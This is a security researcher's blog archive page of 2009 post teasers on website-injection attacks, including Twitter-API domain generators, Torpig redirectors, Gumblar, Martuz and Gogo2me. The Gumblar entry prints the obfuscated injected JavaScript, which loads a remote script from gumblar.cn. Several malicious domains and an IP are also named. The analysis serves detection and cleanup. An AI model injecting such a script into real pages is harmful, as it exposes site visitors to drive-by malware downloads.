
From Hidden Iframes to Obfuscated Scripts

23 Dec 09   Filed in Website exploits with 50 Comments

In December, I noticed that the ubiquitous hidden iframes that had been the prevailing site hack this year seemed to have gone. Unmask Parasites finds them on very few sites now. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites.

At the same time I noticed a new type of obfuscated scripts injected into hacked websites. And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.
Here’s the story »»

Intermediaries to Torpig Attack Sites

15 Dec 09   Filed in Website exploits with 1 Comment

In the previous post, I reviewed a website hack that injected malicious scripts that used the Twitter API to generate domain names for attack sites. The domain names of the attack sites changed twice a day.

However, since the malicious script works on the client side, the algorithm of the domain name generator can be easily extracted and used to predict upcoming malicious domains. To demonstrate this, I created my online “Torpig Domain Generator”, which displays the currently used attack site and the domains of the next two attack sites. It’s been working for more than a week now and so far it is very accurate. (For some unknown reason, hackers didn’t activate malicious domains this past Saturday, but infected sites still redirected to the same domains predicted by my generator.)

The fact that the algorithm is open and the domain names of the upcoming malicious sites are known even before hackers register them means that anyone who wants to stop the attack can pre-register those domains (so far it looks like no one has a spare $20/day for this). The same algorithm can be used to proactively blacklist malicious domain names.

I’m sure hackers are aware of these downsides of open algorithms. Now they are trying to take advantage of frequently changing pseudorandom domain names while hiding the algorithm of the domain name generator behind intermediary redirector servers.
Here’s the story »»

Twitter API Still Attracts Hackers

09 Dec 09   Filed in Website exploits with 6 Comments

A few weeks ago I blogged about hacked sites where malicious scripts used the Twitter API to generate domains of new attack sites and trigger “drive-by” downloads.

As you might remember, I mentioned that the script was buggy (it failed to work on certain days) and that the approach didn’t look viable in the long term, since it required hackers to manually register one new domain name every day. As a result, in November this vector looked abandoned (I couldn’t find active, or even registered, malicious domains).

However, hackers seem to be die-hard fans of Twitter and don’t want to give up on the idea.

A few days ago I found a blacklisted site where search.twitter.com was mentioned as an intermediary in malware distribution. Safe Browsing diagnostic pages also mentioned fresh (beginning of December) malicious domains that were definitely generated by the above-mentioned script. No wonder: on the infected site I found the familiar script. Actually, it was not the same script. It was an improved version of that script.
So what’s new? »»

Hackers Use Twitter API To Trigger Malicious Scripts

11 Nov 09   Filed in Website exploits with 5 Comments

To improve my Unmask Parasites online service, I regularly visit compromised sites and analyze the malicious content cybercriminals inject into legitimate web pages. I have to admit that hackers are very creative, and I learn new tricks every week.

Today, I found an interesting obfuscated script that used the Twitter API to trigger a malicious process.
Here’s the story »»

Ncccnnnc .cn – Warning: Not Opera Only

15 Oct 09   Filed in Website exploits with 11 Comments

This is just a quick post to let you know about a new type of server-wide script-injection attack I’ve just discovered.

I found this post on a phpBB forum and decided to check the infected site with Unmask Parasites. The tool reported a suspicious script:
Continue »»

Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?

18 May 09   Filed in General, Website exploits with 40 Comments

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolves. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain – martuz .cn (95 .129 .145 .58).
Continue »»

Gumblar .cn Exploit – 12 Facts About This Injected Script

07 May 09   Filed in Website exploits with 189 Comments

I’ve been watching this exploit for about a week now. During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However, I have compiled a list of facts that might be useful if you are fighting this exploit.

  1. Infected web pages contain a script that looks like this:

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
Continue »»

Gogo2me – Hidden IFrame Injection.

14 Jan 09   Filed in Website exploits with 29 Comments

The New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.

Symptoms

  1. In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
  2. When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
  3. If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying that your site is a reported attack site and some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
  4. Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/

Continue »»